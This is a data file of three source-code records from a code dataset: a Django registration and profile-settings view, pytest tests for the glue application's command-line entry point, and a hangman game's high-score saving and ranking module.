+{"seq_id":"616081214","text":"from django.urls import reverse_lazy\nfrom django.shortcuts import render, redirect \nfrom django.contrib.auth.decorators import login_required\n\nfrom django.views.generic import CreateView, FormView\n\nfrom .models import Profile \nfrom .forms import (\n CustomUserCreationForm, \n ProfileUpdateForm, \n CustomUserUpdateForm,\n)\n\n\nclass RegisterView(CreateView):\n form_class = CustomUserCreationForm\n success_url = reverse_lazy('login')\n template_name = 'register.html'\n\n\n@login_required\ndef settings(request):\n if request.method == 'POST':\n user_form = CustomUserUpdateForm(request.POST, instance=request.user)\n profile_form = ProfileUpdateForm(request.POST, request.FILES, instance=request.user.profile)\n if user_form.is_valid() and profile_form.is_valid():\n user_form.save()\n profile_form.save()\n return redirect('twitter')\n else:\n user_form = CustomUserUpdateForm(instance=request.user)\n profile_form = ProfileUpdateForm(instance=request.user.profile)\n\n context = {'user_form': user_form, 'profile_form': profile_form}\n return render(request, 'profile_update.html', context)","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"536043063","text":"from __future__ import absolute_import, division, print_function\n\nimport os\nimport pytest\nfrom mock import patch\n\nfrom glue.tests.helpers import requires_qt\n\nfrom ..core import Data\nfrom ..main import (die_on_error, restore_session, load_data_files,\n main, start_glue)\n\n\n@requires_qt\ndef test_die_on_error_exception():\n \"\"\"Decorator should spawn a QMessageBox and exit\"\"\"\n with pytest.raises(SystemExit):\n with patch('qtpy.QtWidgets.QMessageBox') as qmb:\n @die_on_error('test_msg')\n def test():\n raise Exception()\n test()\n assert qmb.call_count == 1\n\n\ndef test_die_on_error_noexception():\n \"\"\"Decorator should have no effect\"\"\"\n @die_on_error('test_msg')\n def test():\n return 0\n assert test() == 0\n\n\ndef test_load_data_files():\n with patch('glue.core.data_factories.load_data') as ld:\n ld.return_value = Data()\n dc = load_data_files(['test.py'])\n assert len(dc) == 1\n\n\ndef check_main(cmd, glue, config, data):\n \"\"\"Pass command to main program, check for expected parsing\"\"\"\n with patch('glue.main.start_glue') as sg:\n main(cmd.split())\n args, kwargs = sg.call_args\n assert kwargs.get('datafiles', None) == data\n assert kwargs.get('gluefile', None) == glue\n assert kwargs.get('config', None) == config\n\n\ndef check_exec(cmd, pyfile):\n \"\"\"Assert that main correctly dispatches to execute_script\"\"\"\n with patch('glue.main.execute_script') as es:\n main(cmd.split())\n args, kwargs = es.call_args\n assert args[0] == pyfile\n\n\ndef test_main_single_data():\n check_main('glueqt test.fits', None, None, ['test.fits'])\n\n\ndef test_main_multi_data():\n check_main('glueqt test.fits t2.csv', None, None, ['test.fits', 't2.csv'])\n\n\ndef test_main_config():\n check_main('glueqt -c config.py', None, 'config.py', None)\n\n\ndef test_main_glu_arg():\n check_main('glueqt -g test.glu', 'test.glu', None, None)\n\n\ndef test_main_auto_glu():\n check_main('glueqt test.glu', 'test.glu', None, None)\n\n\ndef test_main_many_args():\n check_main('glueqt -c config.py data.fits d2.csv', None,\n 'config.py', ['data.fits', 'd2.csv'])\n\n\ndef test_exec():\n check_exec('glueqt -x test.py', 'test.py')\n\n\ndef test_auto_exec():\n check_exec('glueqt test.py', 'test.py')\n\n\n@requires_qt\ndef test_exec_real(tmpdir):\n # Actually test the script execution functionlity\n filename = tmpdir.join('test.py').strpath\n with open(filename, 'w') as f:\n f.write('a = 1')\n with patch('qtpy.QtWidgets.QMessageBox') as qmb:\n with patch('sys.exit') as exit:\n main('glue -x {0}'.format(os.path.abspath(filename)).split())\n assert exit.called_once_with(0)\n\n\n@pytest.mark.parametrize(('cmd'), ['glueqt -g test.glu test.fits',\n 'glueqt -g test.py test.fits',\n 'glueqt -x test.py -g test.glu',\n 'glueqt -x test.py -c test.py',\n 'glueqt -x',\n 'glueqt -g',\n 'glueqt -c'])\ndef test_invalid(cmd):\n with pytest.raises(SystemExit):\n main(cmd.split())\n\n\n@requires_qt\n@pytest.mark.parametrize(('glue', 'config', 'data'),\n [('test.glu', None, None),\n (None, 'test.py', None),\n (None, None, ['test.fits']),\n (None, None, ['a.fits', 'b.fits']),\n (None, 'test.py', ['a.fits'])])\ndef test_start(glue, config, data):\n with patch('glue.main.restore_session') as rs:\n with patch('glue.config.load_configuration') as lc:\n with patch('glue.main.load_data_files') as ldf:\n with patch('glue.app.qt.GlueApplication') as ga:\n with patch('qtpy.QtWidgets') as qt:\n\n rs.return_value = ga\n ldf.return_value = Data()\n\n start_glue(glue, config, data)\n if glue:\n rs.assert_called_once_with(glue)\n if config:\n lc.assert_called_once_with(search_path=[config])\n if data:\n ldf.assert_called_once_with(data)\n","sub_path":"glue/tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
+{"seq_id":"548393275","text":"import random\n\n\n''' The basic idea of calculating the final score:\n wordLength x 2 - strikes '''\n\n\ndef calculateScore(rightAnswer, strikes):\n print(\"Calculating the score\")\n totalScore = (len(rightAnswer) * 2) - strikes\n return totalScore\n\n\ndef saveTotalScore(isFriendGame, playerName, totalScore, rightAnswer):\n print(\"Saving total score\")\n # This is how you are and read txt-files\n if (isFriendGame):\n hScoreList = open('highScoresFriend.txt', 'a')\n hScoreList.write(\n \"player_name:\" + playerName + \"%total_score:\" + str(\n totalScore) + \"%guessed_word:\" + rightAnswer + \"%\" + \"\\n\")\n hScoreList.close() # you can omit in most cases as the destructor will call if\n else:\n hScoreList = open('highScoresUniverse.txt', 'a')\n hScoreList.write(\"player_name:\" + playerName + \"%total_score:\" + str(\n totalScore) + \"%guessed_word:\" + rightAnswer + \"%\" + \"\\n\")\n hScoreList.close() # you can omit in most cases as the destructor will call if\n\n\n # f = open('test.txt', 'r')\n # content = f.readlines()\n # f.close() # you can omit in most cases as the destructor will call if\n # print(\"TXT FILE CONTENT\")\n # print(content)'\n\n\ndef readAndRankHighScores(gameMode):\n if (gameMode == \"friend\"):\n scoreList = open('highScoresFriend.txt').read().splitlines()\n randomRow = random.choice(scoreList).upper()\n return randomRow\n else:\n scoreList = open('highScoresUniverse.txt').read().splitlines()\n randomRow = random.choice(scoreList).upper()\n return randomRow\n\n\ndef getAllScores(gameMode):\n if (gameMode == \"friend\"):\n scoreList = open('highScoresFriend.txt').read().splitlines()\n else:\n scoreList = open('highScoresUniverse.txt').read().splitlines()\n\n allColonsList = []\n allPercentsList = []\n\n # STOP if there are no records of high scores\n if (scoreList):\n # Lets find all \":\" indeces and put them into a list\n for s in scoreList:\n allColonsList.append(list(find_all(s, \":\")))\n\n # Lets find all \"%\" indeces and put them into a list\n for s in scoreList:\n allPercentsList.append(list(find_all(s, \"%\")))\n\n # Lets find all correct values (name, score, word) and put them into a list\n rowValuesList = []\n scoreListRowCounter = 0\n for s in scoreList:\n colonRowCounter = 0\n colons = allColonsList[scoreListRowCounter]\n percents = allPercentsList[scoreListRowCounter]\n valuesList = []\n for i in colons:\n colonItem = colons[colonRowCounter]\n percentItem = percents[colonRowCounter]\n value = s[colonItem + 1:percentItem]\n valuesList.append(value)\n colonRowCounter += 1\n\n rowValuesList.append(valuesList)\n scoreListRowCounter += 1\n\n # Now the values are there correctly, now the list needs to be sorted by score\n rowValuesList = sorted(rowValuesList, key=lambda x: int(x[1]), reverse=True)\n return rowValuesList\n\n\ndef find_all(a_str, sub):\n start = 0\n while True:\n start = a_str.find(sub, start)\n if start == -1: return\n yield start\n start += len(sub) # use start += 1 to find overlapping matches","sub_path":"HangScores.py","file_name":"HangScores.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}